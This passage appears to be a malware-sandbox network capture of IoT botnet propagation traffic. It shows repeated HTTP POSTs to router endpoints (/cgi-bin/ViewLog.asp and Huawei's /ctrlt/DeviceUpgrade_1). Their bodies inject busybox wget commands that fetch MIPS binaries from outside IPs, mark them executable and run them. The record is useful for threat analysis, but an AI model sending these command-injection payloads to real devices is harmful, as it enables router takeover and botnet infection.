                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:30.406613111 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:30.633507967 CET602INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:15:29 GMT
                                              Server:
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' ; object-src 'self' ; worker-src 'self' blob:
                                              Content-Length: 226
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              101192.168.2.134338094.121.186.128080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:30.288666010 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              102192.168.2.133640094.121.64.1598080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:30.306955099 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              103192.168.2.133748894.120.11.1588080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:30.307013988 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              104192.168.2.135416694.182.91.1028080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:30.331684113 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:31.782665014 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              105192.168.2.133422885.93.88.1478080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:30.736164093 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              106192.168.2.1358702156.253.32.22437215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:30.861479044 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:32.486766100 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:34.406636000 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:38.278604031 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:45.958616018 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:01.318553925 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
